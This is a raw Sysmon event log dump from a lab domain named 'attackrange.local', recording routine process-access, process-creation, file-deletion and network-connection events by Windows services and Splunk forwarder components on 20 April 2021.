14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050896Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050895Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050894Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050893Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050892Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050891Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EC6C-607E-F906-00000000BB01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050890Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC6C-607E-F906-00000000BB01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050889Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.011{85C0FFC9-EC6C-607E-F906-00000000BB01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:57.980{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD58C9A33442249618C25C522F681E6D,SHA256=B3361FC4B9DC72CC57968007B61F0514CC9AF804361AE6230E219E4CE555D918,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:56.310{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57663-false10.0.1.12-8000- 354300x800000000000000082197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:55.864{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59133-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000050932Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.776{85C0FFC9-EC6D-607E-FB06-00000000BB01}35483276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050931Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC6D-607E-FB06-00000000BB01}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050930Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050929Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050928Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050927Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050926Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050925Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050924Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050923Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050922Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050921Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EC6D-607E-FB06-00000000BB01}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050920Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC6D-607E-FB06-00000000BB01}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050919Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.667{85C0FFC9-EC6D-607E-FB06-00000000BB01}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000050918Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.104{85C0FFC9-EC6C-607E-FA06-00000000BB01}9602044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050917Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC6C-607E-FA06-00000000BB01}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:58.996{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D3ECEB4CA1ADB0FB3025FC1B174F11C,SHA256=4CDFC067067DA3A54226BB482FD4F87496446F148D00CE7986CA9B44F70ADDF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:58.089{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 